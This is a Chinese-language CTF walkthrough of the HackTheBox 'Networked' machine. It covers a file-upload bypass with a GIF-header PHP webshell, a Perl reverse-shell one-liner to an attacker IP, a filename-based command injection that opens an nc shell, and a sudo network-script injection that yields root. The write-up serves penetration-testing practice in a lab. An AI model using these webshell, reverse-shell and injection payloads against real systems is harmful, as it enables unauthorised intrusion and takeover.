大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Network”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。
本级靶机难度为困难级别,任务是找到靶机上的user.txt和root.txt。
# 信息枚举
利用masscan探测开放端口找到了22,80端口
Nmap探测22,80的服务信息
# 漏洞利用
我们先检查80端口的web,扫描web url我们发现了几个有趣的链接
========================================== =========================ID Response Lines Word Chars Payload ========================================== =========================
000000088: 301 7 L 20 W 235 Ch "backup" 000000862: 301 7 L 20 W 236 Ch "uploads"
我们访问url,backup是整个web备份压缩文件,下载后发现有upload.php和photos.php
我们首先来检查upload.php
<?php require '/var/www/html/lib.php'; define("UPLOAD_DIR", "/var/www/html/uploads/"); if( isset($_POST['submit']) ) { if (!empty($_FILES["myFile"])) { $myFile = $_FILES["myFile"]; if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo '<pre>Invalid image file.</pre>'; displayform(); } if ($myFile["error"] !== UPLOAD_ERR_OK) { echo "<p>An error occurred.</p>"; displayform(); exit; } //$name = $_SERVER['REMOTE_ADDR'].'-'. $myFile["name"]; list ($foo,$ext) = getnameUpload($myFile["name"]); $validext = array('.jpg', '.png', '.gif', '.jpeg'); $valid = false; foreach ($validext as $vext) { if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { $valid = true; } } if (!($valid)) { echo "<p>Invalid image file</p>"; displayform(); exit;
发现upload.php可以上传shell,而且upload.php直接检查后缀和检查文件类型;我们可以上传一个后缀为.php.png的图片shell并且在文件内容里面加上图片头,使我们通过文件检测函数;并且在photos.php中,我们发现我们可以访问到我们上传的图片,只不过图片名称被改为以ip.php.png的格式。
if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) { continue; }
以下为我们webshell的内容
GIF8; <?php system($_GET['cmd']); ?>
我们上传成功了
# 低权限shell
我们使用perl,回连我们的webshell
perl-e 'use Socket;$i="10.10.14.72";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotoby name("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))) {open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
使用TTY获得一个终端:
root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444 [85/85] listening on [any] 4444 ... 10.10.10.146: inverse host lookup failed: Unknown host connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 49656 sh: no job control in this shell sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")' python -c 'import pty;pty.spawn("/bin/bash")' bash-4.2$ ^Z [1]+ 已停止 nc -lvp 4444 root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 4444 reset reset: unknown terminal type unnown Terminal type? xterm bash-4.2$ export SHELL=bash bash-4.2$ export TERM=xterm-256color bash-4.2$ stty rows 36 columns 144
连上后发现我们没有权限查看user.txt并且发现user.txt在guly文件夹下面,我们进入到guly文件夹中发现了check_attack.php
<?php require '/var/www/html/lib.php'; $path = '/var/www/html/uploads/'; $logpath = '/tmp/attack.log'; $to = 'guly'; $msg= ''; $headers = "X-Mailer: check_attack.php\r\n"; $files = array(); $files = preg_grep('/^([^.])/', scandir($path)); foreach ($files as $key => $value) { $msg=''; if ($value == 'index.html') { continue; } #echo "-------------\n"; #print "check: $value\n"; list ($name,$ext) = getnameCheck($value); $check = check_ip($name,$value); if (!($check[0])) { echo "attack!\n"; # todo: attach file file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX); exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; mail($to, $msg, $msg, $headers, "-F$value"); } } ?>
check_attack.php检查不应在uploads目录中的文件并且删除它,并且在rm命令中没有作任何过滤,这样使我们可以命令注入
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); $path = '/var/www/html/uploads/';
我们又回到uploads/目录下面,并且创建一个注入文件
touch '; nc 10.10.14,72 1234 -c bash'
过了蛮久的,nc监听的1234终于来信息了,得到nc shell的第一件事,首先就是使它变得稳定
root@localhost:~/hackthebox_workspace/Networked_146#nc-lvp 1234 listening on [any] 1234 ... 10.10.10.146: inverse host lookup failed: Unknown host connect to [10.10.14.72] from (UNKNOWN) [10.10.10.146] 46548 ls check_attack.php crontab.guly lse.sh shell2 user.txt python -c 'import pty;pty.spawn("/bin/bash")' [guly@networked ~]$ ^Z [1]+ 已停止 nc -lvp 1234 root@localhost:~/hackthebox_workspace/Networked_146# fg nc -lvp 1234 ^Z [1]+ 已停止 nc -lvp 1234 root@localhost:~/hackthebox_workspace/Networked_146# stty raw -echo root@localhost:~/hackthebox_workspace/Networked_146# nc -lvp 1234 reset reset: unknown terminal type unknown Terminal type? xterm [guly@networked ~]$ export SHELL=bash [guly@networked ~]$ export TERM=xterm-256color [guly@networked ~]$ stty rows 36 columns 144 [guly@networked ~]$ cat user.txt 526cfc2305f17faaa*************** 最终我们得到了user.txt
# 权限提升
我们尝试sudo -l我们发现guly可以在/usr/local/sbin/changename.sh以root身份运行而且无需输入密码
[guly@networked ~]$ sudo -l Matching Defaults entries for guly on networked: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User guly may run the following commands on networked: (root) NOPASSWD: /usr/local/sbin/changename.sh 检查/usr/local/sbin/changename.sh #!/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF DEVICE=guly0 ONBOOT=no NM_CONTROLLED=no EoF regexp="^[a-zA-Z0-9_\ /-]+$" for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x done echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly done /sbin/ifup guly0
changename.sh只是接口创建网络脚本,guly激活该接口,他要求这些选项的用户:NAME,PROXY_METHOD,BROWSER_ONLY,BOOTPROTO
https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f
我们根据上面的url可以发现,我们可以在NAME选项中注入命令
[guly@networked network-scripts]$ sudo /usr/local/sbin/changename.sh interface NAME: test bash interface PROXY_METHOD: test interface BROWSER_ONLY: test interface BOOTPROTO: test [root@networked network-scripts]# id uid=0(root) gid=0(root) groups=0(root) [root@networked ~]# cat root.txt 0a8ecda83f1d81251*************** 最后得到root.txt
